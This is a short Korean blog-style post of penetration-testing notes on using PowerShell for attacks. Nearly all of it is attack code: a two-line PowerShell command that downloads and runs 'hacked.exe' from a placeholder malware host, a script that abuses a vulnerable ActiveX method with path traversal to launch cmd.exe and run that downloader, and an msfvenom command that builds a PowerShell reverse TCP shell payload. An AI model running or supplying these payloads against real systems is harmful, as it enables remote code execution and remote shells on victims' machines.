모의해킹에서의 파워쉘 활용

모의해킹에서의 파워쉘 활용

이름은 거창하지만 두가지만 정리해 둔다. 윈도우7 부터 기본적으로 파워쉘을 지원하므로 상당히 유용하다. 

사실 별로 깊이 공부는 하지 않았지만, 모의해킹 중 APT 시나리오(클라이언트 공격부터 시작..)를 위한 페이로드 작성에 매우 유용하기에 

필요한 부분들만 정리를 했었다.

• 악성코드 Download&Execution

$web = New-Object System.Net.WebClient  $web.DownloadFile("http://www.악성코드.com/hacked.exe","C:\hacked.exe") & 'c:\hacked.exe'

달랑 두 줄만으로 가능하다. 명령 실행이 가능한 경우 사용이 가능하다.

대표적인 예로는 ActiveX 의 취약한 메소드를 찾아서 임의의 명령을 실행할 수 있을 때가 있다. 아래와 같이 스크립트를 이용해서

악성코드를 실행시킬 수 있다.

<script>   cmd = "powershell -command \"&{     $web = New-Object System.Net.WebClient;$web.DownloadFile('http://www.악성코드.com/hacked.exe','./hacked.exe');   // 다운로드    & ./hacked.exe    // 실행   }\"";   vulActiveX.Launcher('/c ' + cmd, '../../../../../../windows/system32/cmd.exe')   </script>

• msfpayload 로 powershell 형식 페이로드 작성하기

# msfvenom -p windows/shell/reverse_tcp -f psh lhost=10.231.5.115 lport=4444

여기까지 초간단 정리~!